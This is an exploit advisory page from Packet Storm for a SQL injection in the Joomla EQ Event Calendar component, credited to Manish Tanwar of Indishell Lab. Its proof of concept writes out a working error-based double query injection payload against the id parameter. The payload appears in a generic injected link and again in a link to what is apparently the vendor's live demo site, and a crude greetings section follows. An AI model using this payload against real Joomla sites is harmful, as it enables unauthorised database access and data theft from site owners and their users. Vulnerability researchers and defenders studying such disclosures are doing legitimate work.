exploit the possibilities

Joomla EQ Event Calendar SQL Injection

Joomla EQ Event Calendar SQL Injection
Posted Jun 8, 2015
Authored by Manish Tanwar

Joomla EQ Event Calendar component suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
MD5 | 2795f33319eeb7bd7334c88e96f43f3c

Joomla EQ Event Calendar SQL Injection

Change Mirror Download
##################################################################################################
#Exploit Title : Joomla component EQ Event Calendar SQL Injection vulnerability
#Author : Manish Kishan Tanwar AKA error1046
#Vendor Link : http://codecanyon.net/item/eq-event-calendar-/11169564
#Date : 7/06/2015
#Discovered at : IndiShell Lab
#Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi
#Discovered At : Indishell Lab
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


joomla component EQ Event Calendar is not filtering data in id parameter and hence affected from SQL injection vulnerability

///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to id parameter

////////////////
/// POC ////
///////////////



Use error based double query injection with id parameter
Like error based double query injection for exploiting SQL server version --->
and(select 1 FROM(select count(*),concat((select (select concat(version(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

Injected Link--->
http://target.com/index.php/en/component/eqfullevent?view=lists&id=1 and(select 1 FROM(select count(*),concat((select (select concat(version(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)

demo link--->
http://demo.byeqima.com/index.php/en/component/eqfullevent?view=lists&id=1 and(select 1 FROM(select count(*),concat((select (select concat(version(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)


--==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash
#############################################################################################
--==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik)
--==[[ Special Fuck goes to ]]==--
<3 suriya Cyber Tyson <3
Login or Register to add favorites

File Archive:

September 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    14 Files
  • 2
    Sep 2nd
    19 Files
  • 3
    Sep 3rd
    9 Files
  • 4
    Sep 4th
    1 Files
  • 5
    Sep 5th
    2 Files
  • 6
    Sep 6th
    3 Files
  • 7
    Sep 7th
    12 Files
  • 8
    Sep 8th
    22 Files
  • 9
    Sep 9th
    17 Files
  • 10
    Sep 10th
    19 Files
  • 11
    Sep 11th
    3 Files
  • 12
    Sep 12th
    2 Files
  • 13
    Sep 13th
    15 Files
  • 14
    Sep 14th
    16 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    7 Files
  • 17
    Sep 17th
    13 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close